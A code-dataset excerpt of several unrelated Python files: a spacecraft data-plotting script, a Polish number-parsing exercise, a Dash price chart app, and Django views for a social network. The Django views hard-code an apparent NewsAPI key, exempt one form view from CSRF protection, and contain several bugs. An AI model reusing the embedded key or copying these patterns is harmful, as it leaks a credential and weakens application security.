product.\n \"\"\"\n\n # File types and start times\n parts = [parse_file_name(file) for file in files]\n bases = ['_'.join(p[0:5]) for p in parts]\n tstart = [p[-2] for p in parts]\n\n # Sort everything\n idx = sorted(range(len(tstart)), key=lambda k: tstart[k])\n bases = [bases[i] for i in idx]\n files = [files[i] for i in idx]\n\n # Find unique file types\n fsort = []\n uniq_bases = list(set(bases))\n for ub in uniq_bases:\n fsort.append([files[i] for i, b in enumerate(bases) if b == ub])\n\n return tuple(fsort)\n\n\n\n\n# the following is the code from the util.py file\n\n\n# cdfepoch requires datetimes to be broken down into 9-element lists\ndef datetime_to_list(t):\n return [t.year, t.month, t.day,\n t.hour, t.minute, t.second,\n int(t.microsecond // 1e3),\n int(t.microsecond % 1e3),\n 0]\n\n\ndef tt2000_range(cdf, t_vname, start_date, end_date):\n # Create lists\n tstart = datetime_to_list(start_date)\n tend = datetime_to_list(end_date)\n\n # Convert to TT2000\n tstart = cdflib.cdfepoch.compute(tstart)\n tend = cdflib.cdfepoch.compute(tend)\n\n # Find the time range\n return cdf.epochrange(epoch=t_vname, starttime=tstart, endtime=tend)\n\n\ndef from_cdflib(files, varname, start_date, end_date):\n global cdf_vars\n global file_vars\n\n if isinstance(files, str):\n files = [files]\n tstart = datetime_to_list(start_date)\n tend = datetime_to_list(end_date)\n\n # Extract metadata\n cdf_vars = {}\n for file in files:\n file_vars = {}\n cdf = cdflib.CDF(file)\n\n try:\n data = cdflib_readvar(cdf, varname, tstart, tend)\n except:\n cdf.close()\n raise\n\n cdf.close()\n\n return data\n\n\ndef cdflib_readvar(cdf, varname, tstart, tend):\n global cdf_vars\n global file_vars\n\n # Data has already been read from this file\n if varname in file_vars:\n var = file_vars[varname]\n else:\n time_types = ('CDF_EPOCH', 'CDF_EPOCH16', 'CDF_TIME_TT2000')\n varinq = cdf.varinq(varname)\n\n # Convert epochs to datetimes\n data = cdf.varget(variable=varname, starttime=tstart, endtime=tend)\n if varinq['Data_Type_Description'] in time_types:\n data = cdflib.cdfepoch().to_datetime(data)\n\n # If the variable has been read from a different file, append\n if (varname in cdf_vars) and varinq['Rec_Vary']:\n d0 = cdf_vars[varname]\n data = np.append(d0['data'], data, 0)\n\n # Create the variable\n var = {'name': varname,\n 'data': data,\n 'rec_vary': varinq['Rec_Vary'],\n 'cdf_name': varinq['Variable'],\n 'cdf_type': varinq['Data_Type_Description']\n }\n\n # List as read\n # - Prevent infinite loop. Must save the variable in the registry\n # so that variable attributes do not try to read the same variable\n # again.\n cdf_vars[varname] = var\n file_vars[varname] = var\n\n # Read the metadata\n cdflib_attget(cdf, var, tstart, tend)\n\n return var\n\n\ndef cdflib_attget(cdf, var, tstart, tend):\n # Get variable attributes for given variable\n varatts = cdf.varattsget(var['cdf_name'])\n\n # Get names of all cdf variables\n cdf_varnames = cdf.cdf_info()['zVariables']\n\n # Follow pointers to retrieve data\n for attrname, attrvalue in varatts.items():\n var[attrname] = attrvalue\n if isinstance(attrvalue, str) and (attrvalue in cdf_varnames):\n var[attrvalue] = cdflib_readvar(cdf, attrvalue, tstart, tend)\n\n\ndef plot_1D(data, axes):\n # Plot the data\n lines = axes.plot(mdates.date2num(data[data['DEPEND_0']]['data']),\n data['data'])\n\n try:\n axes.set_yscale(data['SCALETYP'])\n except KeyError:\n pass\n\n try:\n for line, color in zip(lines, data['color']):\n line.set_color(color)\n except KeyError:\n pass\n\n try:\n # Set the label for each line so that they can\n # be returned by Legend.get_legend_handles_labels()\n for line, label in zip(lines, data[data['LABL_PTR_1']]['data']):\n line.set_label(label)\n\n # Create the legend outside the right-most axes\n leg = axes.legend(bbox_to_anchor=(1.05, 1),\n borderaxespad=0.0,\n frameon=False,\n handlelength=0,\n handletextpad=0,\n loc='upper left')\n\n # Color the text the same as the lines\n for line, text in zip(lines, leg.get_texts()):\n text.set_color(line.get_color())\n\n except KeyError:\n pass\n\n\ndef plot_2D(data, axes):\n # Convert time to seconds and reshape to 2D arrays\n x0 = mdates.date2num(data[data['DEPEND_0']]['data'])\n x1 = data[data['DEPEND_1']]['data']\n if x0.ndim == 1:\n x0 = np.repeat(x0[:, np.newaxis], data['data'].shape[1], axis=1)\n if x1.ndim == 1:\n x1 = np.repeat(x1[np.newaxis, :], data['data'].shape[0], axis=0)\n\n # Format the image\n y = data['data'][0:-1, 0:-1]\n try:\n if data['SCALETYP'] == 'log':\n y = np.ma.log(y)\n except KeyError:\n pass\n\n # Create the image\n im = axes.pcolorfast(x0, x1, y, cmap='nipy_spectral')\n axes.images.append(im)\n\n try:\n axes.set_yscale(data[data['DEPEND_1']]['SCALETYP'])\n except KeyError:\n pass\n\n # Create a colorbar to the right of the image\n cbaxes = inset_axes(axes,\n width='1%', height='100%', loc=4,\n bbox_to_anchor=(0, 0, 1.05, 1),\n bbox_transform=axes.transAxes,\n borderpad=0)\n cb = plt.colorbar(im, cax=cbaxes, orientation='vertical')\n\n\ndef plot_burst_selections(sc, start_date, end_date,\n figsize=(5.5, 7)):\n mode = 'srvy'\n level = 'l2'\n\n\n\n\n # FGM\n b_vname = '_'.join((sc, 'fgm', 'b', 'gse', mode, level))\n mms = MrMMS_SDC_API(sc, 'fgm', mode, level,\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = sort_files(files)[0]\n#us different function here\n fgm_data = ff.cdf_to_df(files,b_vname) # from_cdflib(files, b_vname,\n #start_date, end_date)\n fgm_data['data'] = fgm_data['data'][:, [3, 0, 1, 2]]\n fgm_data['color'] = ['Black', 'Blue', 'Green', 'Red']\n fgm_data[fgm_data['LABL_PTR_1']]['data'] = ['|B|', 'Bx', 'By', 'Bz']\n\n # FPI DIS\n fpi_mode = 'fast'\n ni_vname = '_'.join((sc, 'dis', 'numberdensity', fpi_mode))\n espec_i_vname = '_'.join((sc, 'dis', 'energyspectr', 'omni', fpi_mode))\n BV_vname = '_'.join((sc,'dis','bulkv_gse',fpi_mode))\n mms = MrMMS_SDC_API(sc, 'fpi', fpi_mode, level,\n optdesc='dis-moms',\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = sort_files(files)[0]\n\n ni_data = ff.cdf_to_df(files,ni_vname)#from_cdflib(files, ni_vname,\n # start_date, end_date)\n especi_data = ff.cdf_to_df(files,espec_i_vname)#from_cdflib(files, espec_i_vname,\n # start_date, end_date)\n BV_data = ff.cdf_to_df(files,BV_name)#from_cdflib(files, BV_vname,\n # start_date,end_date)\n\n # FPI DES\n ne_vname = '_'.join((sc, 'des', 'numberdensity', fpi_mode))\n espec_e_vname = '_'.join((sc, 'des', 'energyspectr', 'omni', fpi_mode))\n mms = MrMMS_SDC_API(sc, 'fpi', fpi_mode, level,\n optdesc='des-moms',\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = sort_files(files)[0]\n #ne_data = from_cdflib(files, ne_vname,\n # start_date, end_date)\n espece_data = ff.cdf_to_df(files,espec_e_vname)#from_cdflib(files, espec_e_vname,\n # start_date, end_date)\n\n # Grab selections\n abs_data = selections('abs', start_date, end_date,\n combine=True, sort=True,filter= 'MP')\n sitl_data = selections('sitl+back', start_date, end_date,\n combine=True, sort=True,filter='MP')\n gls_data = selections('mp-dl-unh', start_date, end_date,\n combine=True, sort=True,filter='MP')\n\n # SITL data time series\n t_abs = []\n x_abs = []\n for selection in abs_data:\n t_abs.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_abs.extend([0, selection.fom, selection.fom, 0])\n if len(abs_data) == 0:\n t_abs = [start_date, end_date]\n x_abs = [0, 0]\n abs = {'data': x_abs,\n 'DEPEND_0': 't',\n 't': {'data': t_abs}}\n\n t_sitl = []\n x_sitl = []\n for selection in sitl_data:\n t_sitl.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_sitl.extend([0, selection.fom, selection.fom, 0])\n if len(sitl_data) == 0:\n t_sitl = [start_date, end_date]\n x_sitl = [0, 0]\n sitl = {'data': x_sitl,\n 'DEPEND_0': 't',\n 't': {'data': t_sitl}}\n\n t_gls = []\n x_gls = []\n for selection in gls_data:\n t_gls.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_gls.extend([0, selection.fom, selection.fom, 0])\n if len(gls_data) == 0:\n t_gls = [start_date, end_date]\n x_gls = [0, 0]\n gls = {'data': x_gls,\n 'DEPEND_0': 't',\n 't': {'data': t_gls}}\n\n # Setup plot\n nrows = 8#7\n ncols = 1\n fig, axes = plt.subplots(nrows=nrows, ncols=ncols,\n figsize=figsize, squeeze=False)\n locator = mdates.AutoDateLocator()\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Plot FGM\n plot_2D(especi_data, axes[0, 0])\n axes[0, 0].set_title(sc.upper())\n fig.axes[-1].set_label('DEF')\n axes[0, 0].set_ylabel('$E_{ion}$\\n(eV)')\n axes[0, 0].set_xticks([])\n axes[0, 0].set_xlabel('')\n\n plot_2D(espece_data, axes[1, 0])\n fig.axes[-1].set_label('DEF\\nLog_{10}(keV/(cm^2 s sr keV))')\n axes[1, 0].set_ylabel('$E_{e-}$\\n(eV)')\n axes[1, 0].set_xticks([])\n axes[1, 0].set_xlabel('')\n axes[1, 0].set_title('')\n\n plot_1D(fgm_data, axes[2, 0])\n axes[2, 0].set_ylabel('B\\n(nT)')\n axes[2, 0].set_xticks([])\n axes[2, 0].set_xlabel('')\n axes[2, 0].set_title('')\n\n plot_1D(ni_data, axes[3, 0])\n axes[3, 0].set_ylabel('$N_{i}$\\n($cm^{-3}$)')\n axes[3, 0].set_xticks([])\n axes[3, 0].set_xlabel('')\n axes[3, 0].set_title('')\n\n plot_1D(BV_data, axes[4, 0])\n axes[4, 0].set_ylabel('V\\n(km/s)')\n # axes[4, 0].set_ylim(200, 200)\n axes[4, 0].set_xticks([])\n axes[4, 0].set_xlabel('')\n axes[4, 0].set_title('')\n\n plot_1D(abs, axes[5, 0])\n axes[5, 0].set_ylabel('ABS')\n axes[5, 0].set_xticks([])\n axes[5, 0].set_xlabel('')\n axes[5, 0].set_title('')\n\n plot_1D(gls, axes[6, 0])\n axes[6, 0].set_ylabel('GLS')\n axes[6, 0].set_ylim(0, 200)\n axes[6, 0].set_xticks([])\n axes[6, 0].set_xlabel('')\n axes[6, 0].set_title('')\n\n plot_1D(sitl, axes[7, 0])\n axes[7, 0].set_ylabel('SITL')\n axes[7, 0].set_title('')\n axes[7, 0].xaxis.set_major_locator(locator)\n axes[7, 0].xaxis.set_major_formatter(formatter)\n for tick in axes[7, 0].get_xticklabels():\n tick.set_rotation(45)\n\n # Set a common time range\n plt.setp(axes, xlim=mdates.date2num([start_date, end_date]))\n plt.subplots_adjust(left=0.27, right=0.85, top=0.93)\n return fig, axes\n()","repo_name":"Riley-Powell/RP-MMS-Research","sub_path":"time_to_orbit.py","file_name":"time_to_orbit.py","file_ext":"py","file_size_in_byte":151591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14046174918","text":"# zad 1 lista 5\n\ndef text2int(textnum, numwords={}):\n if not numwords:\n units = [\"zero\", \"jeden\", \"dwa\", \"trzy\", \"cztery\", \"piec\", \"szesc\", \"siedem\", \"osiem\",\n \"dziewiec\", \"dziesiec\", \"jedenascie\", \"dwanascie\", \"trzynascie\", \"czternascie\", \"pietnascie\",\n \"szesnascie\", \"siedemnascie\", \"osiemanscie\", \"dziewietnascie\",]\n\n tens = [\"\", \"\", \"dwadziescia\", \"trzydziesci\", \"czterdziesci\", \"piecdziesiat\", \"szescdziesiat\", \"siedemdziesiat\", \"osiemdziesiat\", \"dziewiecdziesiat\"]\n\n scales = [\"sto\", \"tysiac\", \"milion\", \"miliard\", \"bilion\"]\n\n numwords[\"and\"] = (1, 0)\n for idx, word in enumerate(units): numwords[word] = (1, idx)\n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** (idx * 3 or 2), 0)\n\n current = result = 0\n for word in textnum.split():\n if word not in numwords:\n raise Exception(\"nie poprawna nazwa: \" + word)\n\n scale, increment = numwords[word]\n current = current * scale + increment\n if scale > 100:\n result += current\n current = 0\n\n return result + current\n\n#print(text2int(\"seven billion one hundred million thirty one thousand three hundred thirty seven\"))\n#7100031337\n\n#print(text2int(\"piec\"))\n\nprint(\"podaj liczbe slownie bez znakow polskich\")\ntekst = str(input())\nprint(text2int(tekst))","repo_name":"Ustregal/JSP2019","sub_path":"lista5/Z1L5.py","file_name":"Z1L5.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13273711673","text":"import pandas as pd\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objs as go\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime\nfrom textwrap import dedent\n# Plotly\nimport plotly.plotly as py\nimport plotly.tools as tls\n# fig_to_uri\nfrom io import BytesIO\nimport base64\n# To register the converters:\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\ncommodities = ['broccoli', 'iceberg_lettuce', 'potatoes', 'tomatoes']\n\ndef fig_to_uri(in_fig, close_all=True, **save_args):\n # type: (plt.Figure) -> str\n \"\"\"\n Save a figure as a URI\n :param in_fig:\n :return:\n \"\"\"\n out_img = BytesIO()\n in_fig.savefig(out_img, format='png', **save_args)\n if close_all:\n in_fig.clf()\n plt.close('all')\n out_img.seek(0) # rewind file\n encoded = base64.b64encode(out_img.read()).decode(\"ascii\").replace(\"\\n\", \"\")\n return \"data:image/png;base64,{}\".format(encoded)\n\n# Converting to Plotly's Figure object..\n#plotly_fig = tls.mpl_to_plotly(fig_plot_save_produce)\n\n# Dash app\napp = dash.Dash()\n\nserver = app.server\n\napp.layout = html.Div([\n html.H1('Forecasting agricultural product price',\n ),\n\n dcc.Markdown(dedent('''\n ## Show farm-gate price and retail price for selected commodity\n\n Please select a commodity\n ''')\n ),\n\n dcc.Dropdown(\n id='product-dropdown',\n options=[{'label': i, 'value': i} for i in commodities],\n multi=False,\n #value=['broccoli']\n value='broccoli'\n ),\n #dcc.Graph(id='graph-with-dropdown'),\n #html.Div([html.Img(id = 'product_plot',src='')])\n html.Div([html.Img(id = 'product_plot', style={\n 'height' : '50%',\n 'width' : '50%',\n 'float' : 'left',\n 'position' : 'relative',\n 'padding-top' : 0,\n 'padding-right' : 0\n },)])\n\n])\n\n@app.callback(\n dash.dependencies.Output('product_plot', 'src'),\n [dash.dependencies.Input('product-dropdown', 'value')])\ndef update_figure(product_name):\n\n #input_data = pd.read_csv('../Data/farm-to-retail-price/'+product_name[0]+'.csv')\n input_data = pd.read_csv('../Data/farm-to-retail-price/'+product_name+'.csv')\n\n # Date to Index\n input_data.index = input_data[\"Year\"]\n del input_data[\"Year\"]\n\n plt.rcParams['xtick.labelsize']=14\n plt.rcParams['ytick.labelsize']=14\n plt.figure(figsize=(10,5))\n plt.xticks(rotation=45)\n\n datelist = pd.to_datetime(input_data.index, format='%Y')\n plt.plot_date(datelist, input_data['Retail'], '-o')\n plt.plot_date(datelist, input_data['Farm'],'-o')\n\n #graphtitle = product_name[0]\n graphtitle = product_name\n\n plt.xlabel('Date', fontsize=14)\n plt.ylabel('Price (cents/lb)', fontsize=14)\n plt.title(graphtitle)\n plt.legend(loc='best')\n\n #figpng = plt.savefig(product_name[0]+'.png')\n\n out_url = fig_to_uri(plt)\n\n return out_url\n #return plt.figure()\n #return str('broccoli.jpg')\n #return product_name[0]+'.png'\n #return 'data:image/png;base64,'+product_name[0]+'.png'\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"hyungsuk-son/forecasting-price-spread","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15881287536","text":"import json\n# import simplejson\nimport phonenumbers\nfrom datetime import datetime\nfrom phonenumbers import geocoder\nfrom phonenumbers import carrier\nimport string,random\nfrom django.db.models import Q\n\nfrom django.http import HttpResponse,HttpResponseRedirect\n\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom social.models import Post,Report\n\nfrom social.forms import PostForm\n\nfrom byhand.models import Follow,UserExtend,CustomUser,Bio\nfrom longprofile.models import Follow2,Endorse,Connection\n\nfrom social.models import Like,Comment,Achievement,Projects,Cexepertise,About,Expertise,Achievements,Experience,Certificate,Enquiry,Testimonial,Client,Branch ,Working ,Notification,Brousher,Cards,Image,Documents,Location\n\n\nfrom social.forms import WorkingForm,AboutForm,ClientForm\nfrom googletrans import Translator\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth.decorators import login_required\n\n\n\n\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import get_object_or_404\n\nfrom social.forms import ExpertiseForm,AchievementsForm,ProjectsForm,ExperienceForm,TestimonialForm,CertificateForm,BranchForm\nfrom newsapi import NewsApiClient\nfrom longprofile.models import *\n\n@login_required(login_url = 'login')\ndef PostView(request):\n form = PostForm()\n if request.method == 'POST':\n form = PostForm(request.POST,request.FILES)\n\n if form.is_valid():\n post = form.save(commit=False)\n a = form.cleaned_data['caption']\n b = form.cleaned_data['file']\n p =request.POST.get('privacy')\n post.user_id = request.user.id\n c= request.user.id \n post.privacy = p\n \n post.save()\n\n\n\n\n\n\n\n # Cmnt = request.POST.get('caption')\n # img = request.POST.get('image')\n # post = Post()\n # post.caption = Cmnt\n # post.image = img\n # post.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef index(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n \n\n fol = Follow.objects.filter(follower_id = request.user.id)\n\n group_ids = []\n for i in fol:\n group_ids.append(i.following_id)\n\n\n \n post_items = Post.objects.filter(user_id__in=group_ids).all()\n \n\n\n\n liked = Like.objects.filter(user_id=request.user.id).exists()\n\n if request.method == \"POST\":\n id = request.POST.get('id')\n comment = request.POST.get('comment')\n commentv = Comment()\n commentv.comment = comment\n commentv.post_id = id\n commentv.user_id = request.user.id\n comment.bio_id == request.user.id\n commentv.save()\n post = Post.objects.get(id = id)\n \n current_comments = post.comments\n post.comments = current_comments + 1\n post.save()\n\n\n\n\n\n\n\n\n # pos = Post.objects.filter(user_id = request.user.id)\n context = {\n 'liked':liked,\n 'post_items': post_items,\n 'company':company,\n\n\n }\n\n return render(request,'index.html',context)\n\n\n@login_required(login_url = 'login')\ndef timeline(request):\n \n try:\n userextend = UserExtend.objects.get(user_id = request.user.id)\n except:\n return redirect('register_as')\n newsapi = NewsApiClient(api_key='c0418e40b3a04a9b8e853126e29d8f7a')\n top_headlines = newsapi.get_top_headlines(q='covid',language='en',country='in')\n ntitle = top_headlines['articles'][0]['title']\n ndes = top_headlines['articles'][0]['description']\n nurl = top_headlines['articles'][0]['url']\n nimg = top_headlines['articles'][0]['urlToImage']\n\n \n\n \n \n company = request.user.groups.filter(name='COMPANY').exists()\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview = \"\"\n \n \n\n fol = Follow2.objects.filter(following_id=request.user.id)\n \n _x = Post.objects.all()\n \n\n\n group_ids = []\n group_ids.append(request.user.id)\n # group_ids.append(1)\n \n if fol:\n for i in fol:\n group_ids.append(i.follower_id)\n \n\n \n post_items = Post.objects.filter(user_id__in=group_ids,privacy = 1,is_deleted = 0).all()\n\n liked_posts = [i for i in post_items if Like.objects.filter(post_id = i,user_id = request.user.id )]\n\n\n comments = [i for i in post_items if Comment.objects.filter(post_id = i)]\n\n \n \n\n\n context = {\n 'userextend':userextend,\n 'post_items':post_items,\n 'liked_posts':liked_posts,\n 'comments':comments,\n 'bioview':bioview,\n 'company':company,\n 'ntitle':ntitle,\n 'ndes':ndes,\n 'nurl':nurl,\n 'nimg':nimg\n }\n return render(request,'timeline/timeline.html',context)\n\n\n\n\n@login_required(login_url = 'login')\ndef like(request,id):\n\n\n # if liked:\n # dislike = Like.objects.filter(post_id = id)\n # dislike.delete()\n # liked = False\n # return HttpResponse('true')\n # else:\n\n\n like=Like()\n like.user_id = request.user.id\n like.post_id = id\n like.save()\n\n post = Post.objects.get(id=id)\n current_like = post.likes\n post.likes = current_like +1\n post.save()\n return redirect('index')\n\n@login_required(login_url = 'login')\ndef dislike(request,id):\n dislike = Like.objects.filter(post_id = id)\n dislike.delete()\n\n post = Post.objects.get(id=id)\n current_like = post.likes\n post.likes = current_like - 1\n post.save()\n return redirect('index')\n\n\n@login_required(login_url = 'login')\ndef postlike(request,id):\n \n liked = Like.objects.filter(user_id = request.user.id,post_id = id)\n lc = Like.objects.filter(post_id = id).count()\n \n\n post = Post.objects.get(id = id)\n p = post.user.id\n \n is_liked = True if liked else False\n if is_liked:\n liked.delete()\n notify = Notification.objects.filter(post = post ,sender = request.user.id,notification_type = 1)\n notify.delete()\n is_liked = False\n lcn = Like.objects.filter(post_id = id).count()\n\n else:\n like = Like()\n like.user_id = request.user.id\n like.post_id = id\n like.save()\n notify = Notification()\n notify.post_id = id\n \n if request.user.id != post.user.id:\n notify.sender_id = request.user.id\n notify.user_id = p\n notify.notification_type= 1\n notify.save()\n is_liked = True\n lcn = Like.objects.filter(post_id = id).count()\n\n resp = {\n \"liked\":is_liked,\n \"post_id\":id,\n \"lcn\":lcn,\n }\n response = json.dumps(resp)\n return HttpResponse(response, content_type=\"application/json\")\n\n\n@login_required(login_url = 'login')\n\ndef likecount(request,id):\n likescount = Like.objects.filter(post_id = id).count()\n\n return render(request,'index.html',{'likescount':likescount})\n\n# def comment(request):\n#\n# return HttpResponse('sucess')\n#\n# return render(request,'index.html')\n\n\n@login_required(login_url = 'login')\ndef post_detail(request,id):\n company = request.user.groups.filter(name='COMPANY').exists()\n digits = ''.join(random.sample(string.digits, 2))\n chars = ''.join(random.sample(string.ascii_lowercase, 3))\n \n\n liked_posts = Like.objects.filter(user_id = request.user.id,post_id = id)\n post = Post.objects.get(id=id)\n comment = Comment.objects.filter(post_id = id)\n\n context = {\n 'post':post,\n 'comment':comment,\n 'liked_posts':liked_posts,\n 'company':company\n }\n return render(request,'timeline/post_details_page.html',context)\n\n\n\n\n@login_required(login_url = 'login')\ndef comment(request):\n if request.method == \"POST\":\n post = request.POST.get('commentid')\n commentfeed = request.POST.get('comments')\n\n postid = int(post)\n p = Post.objects.get(id = postid)\n \n sender = p.user.id\n \n comment = Comment()\n comment.post_id = post\n comment.user_id = request.user.id\n \n comment.comment = commentfeed\n comment.save()\n\n # bio = Bio.objects.get(id = request.user.id)\n # profile = bio.image\n\n notify = Notification()\n notify.post_id = post\n notify.user_id = sender\n if request.user.id != p.user.id:\n \n notify.sender_id =request.user.id\n notify.notification_type = 2\n notify.save()\n\n comment_list = []\n\n comment_list = [{\n \"sender\" : request.user.id,\n \"comment\": commentfeed,\n }]\n\n return JsonResponse(comment_list, safe=False)\n\n\n\n # return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n \n@login_required(login_url = 'login')\n@csrf_exempt\ndef postreport(request):\n if request.method == \"POST\":\n postid = request.POST.get('postid')\n report = request.POST.get('gender')\n \n \n postreport = Report()\n postreport.post_id = postid\n postreport.content = report\n postreport.reporter_id =request.user.id\n postreport.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n\n\ndef postDelete(request):\n a = request.POST.get('id')\n d = Post.objects.get(pk=a)\n d.is_deleted = 1\n d.save()\n return HttpResponse('')\n\n@login_required(login_url = 'login')\ndef enquiry(request):\n if request.method == \"POST\":\n enquirytitle = request.POST.get('enquiry-name')\n enquirydescription = request.POST.get('enquiry-description')\n\n enquiry = Enquiry()\n enquiry.user_id = request.user.id\n enquiry.title = enquirytitle\n enquiry.description = enquirydescription\n enquiry.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef profile(request):\n \n\n return render(request,'profile/profile.html')\n\n\n@login_required(login_url = 'login')\ndef companyprofile(request):\n print(request.user.id)\n \n try:\n userextend = UserExtend.objects.get(user_id = request.user.id)\n except:\n return redirect('register_as')\n \n company = request.user.groups.filter(name='COMPANY').exists()\n \n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = request.user.id)\n except:\n location = ''\n \n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n \n form = WorkingForm()\n expertiselist = Expertise.objects.filter(user_id=request.user.id)\n achievements = Achievements.objects.filter(user_id=request.user.id)\n projects = Projects.objects.filter(user_id=request.user.id)\n certificates = Certificate.objects.filter(user_id=request.user.id)\n clients = Client.objects.filter(user_id = request.user.id)\n branches = Branch.objects.filter(user_id = request.user.id)\n\n testimonial = Testimonial.objects.filter(user_id= request.user.id)\n companies = CustomUser.objects.all()\n AchievementFormSet = modelformset_factory(Achievement, fields=('name',), extra=3)\n formset = AchievementFormSet(queryset=Achievement.objects.filter(user_id=request.user.id))\n \n following_count = Follow2.objects.filter(following_id = request.user.id).count()\n follower_count = Follow2.objects.filter(follower_id = request.user.id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =request.user.id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=request.user.id, connection=1) | Q(user_id=request.user.id, connection=1)).count()\n try:\n about = About.objects.get(user_id = request.user.id).about\n a = 1\n \n except:\n about = \"None\"\n a = 2\n \n\n\n try:\n monview = Working.objects.get(day =1 , user_id = request.user.id)\n \n except:\n monview = ''\n \n\n try:\n tueview = Working.objects.get(day =2,user_id = request.user.id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3,user_id = request.user.id )\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = request.user.id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = request.user.id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = request.user.id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = request.user.id )\n \n except:\n sunview = ''\n \n\n\n context = {\n 'form':form,\n 'formset':formset,\n 'userextend':userextend,\n 'about':about,\n 'expertiselist':expertiselist,\n 'achievements':achievements,\n 'projects':projects,\n 'certificates':certificates,\n 'companies':companies,\n 'clients':clients,\n 'branches':branches,\n 'testimonial':testimonial,\n 'monview':monview,\n 'tueview':tueview,\n 'wedview':wedview,\n 'thuview':thuview,\n 'friview':friview,\n 'satview':satview,\n 'sunview':sunview,\n 'bioview':bioview,\n 'company':company,\n 'location':location,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n 'abouth':abouth,\n\n }\n return render(request,'profile/profile-company-edit.html',context)\n\n@login_required(login_url = 'login')\ndef userprofile(request):\n \n try:\n userextend = UserExtend.objects.get(user_id = request.user.id)\n except:\n return redirect('register_as')\n company = request.user.groups.filter(name='COMPANY').exists()\n\n \n all_users = CustomUser.objects.values_list('first_name', flat=True)\n \n all_img = Bio.objects.all().distinct()\n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = request.user.id)\n except:\n location = ''\n\n \n\n Company = CustomUser.objects.filter(groups__name = \"COMPANY\")\n \n companies = CustomUser.objects.all()\n expertiselist = Expertise.objects.filter(user_id = request.user.id)\n achievements = Achievements.objects.filter(user_id = request.user.id)\n projects = Projects.objects.filter(user_id = request.user.id)\n experiences = Experience.objects.filter(user_id = request.user.id)\n certificates = Certificate.objects.filter(user_id= request.user.id)\n testimonials = Testimonial.objects.filter(user_id = request.user.id)\n clients = Client.objects.filter(user_id = request.user.id)\n n = len(certificates)\n \n following_count = Follow2.objects.filter(following_id = request.user.id).count()\n follower_count = Follow2.objects.filter(follower_id = request.user.id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =request.user.id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=request.user.id, connection=1) | Q(user_id=request.user.id, connection=1)).count()\n \n\n try:\n monview = Working.objects.get(day =1 ,user_id = request.user.id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = request.user.id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = request.user.id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = request.user.id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = request.user.id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = request.user.id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = request.user.id )\n \n except:\n sunview = ''\n \n\n\n context = {\n 'companies':companies,\n 'userextend':userextend,\n 'expertiselist':expertiselist,\n 'achievements':achievements,\n 'projects':projects,\n 'experiences':experiences,\n 'certificates':certificates,\n 'testimonials':testimonials,\n 'clients':clients,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'bioview':bioview,\n 'Company':Company,\n 'company':company,\n 'location':location,\n 'all_users': all_users,\n 'all_img':all_img,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n 'abouth':abouth,\n \n \n\n }\n\n return render(request,'profile/profile-user-edit.html',context)\n\n\n@login_required(login_url = 'login')\ndef companyprofileview(request,id):\n \n company = 